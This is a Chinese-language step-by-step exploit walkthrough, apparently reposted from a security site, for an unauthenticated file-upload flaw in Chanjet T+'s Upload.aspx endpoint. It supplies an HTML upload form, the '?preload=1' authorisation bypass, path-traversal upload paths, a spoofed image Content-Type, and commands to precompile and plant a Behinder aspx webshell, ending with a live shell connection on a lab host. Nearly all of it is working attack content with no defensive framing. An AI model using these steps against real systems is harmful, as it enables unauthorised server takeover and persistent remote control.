创建一个html文件代码如下：

<form action="http://192.168.187.133/tplus/SM/SetupAccount/Upload.aspx" name="form1" id="form1" method="post" enctype="multipart/form-data">[出自:jiwo.org]
<input name="File1" type="file" id="File1"> <br> 
<input type="submit" value="上 传">
</form>
修改为目标ip，打开html文件进行文件上传

上传图片进行抓包

上传个图片进行测试一下，url处添加?preload=1进行未授权绕过

使用冰蝎4.0.5生成aspx木马，使用win10自带软件aspnet_compiler.exe进行编码

软件路径：C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe

命令如下：

aspnet_compiler.exe -v \ -p D:\in D:\out

#D:\in aspx木马目录

#D:\out 输出目录

上传D:\out目录下的aspx木马抓包，修改以下三处进行发包 url+?preload=1,上传的路径为../../../xx.aspx，Content-Type: image/jpeg

200代表上传成功，

进入靶机发现查看，上传成功

继续上传D:\out\bin\目录下的文件，抓包，修改以下三处进行发包 url+?preload=1,上传的路径为../../../bin/xxxx.compiled，Content-Type: image/jpeg

继续上传D:\out\bin\目录下的文件，抓包，修改以下三处进行发包 url+?preload=1,上传的路径为../../../bin/xxxx.dll，Content-Type: image/jpeg

进入靶机查看上传成功

打开冰蝎进行连接：url：http://192.168.187.133/tplus/0x111.aspx?preload=1

连接成功